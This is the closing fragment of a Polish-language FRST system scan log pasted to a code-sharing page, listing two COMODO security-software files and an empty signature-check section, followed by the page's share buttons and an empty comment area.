2019-07-13 20:45 - 2019-07-04 21:21 - 004753280 _____ (COMODO) C:\Documents and Settings\All Users\Dane aplikacji\cis2B.exe
2019-07-13 20:45 - 2019-07-04 21:25 - 000377216 _____ (COMODO) C:\Documents and Settings\All Users\Dane aplikacji\cmdres.dll
 
==================== SigCheck ===============================
 
(Brak automatycznej naprawy dla plików które nie przeszły weryfikacji.)
 
==================== Koniec  FRST.txt ============================
Wygenerowano w 0.035s, przy pomocy GeSHi 1.0.8
'
Podziel się na Facebook Podziel się na BLIP Podziel się na Twitter Podziel się na Buzz Podziel się na Flaker Dodaj zakładkę Google Podziel się na Delicious Wykop to!

Nowy Komentarz:

Komentarze:

Brak Komentarzy!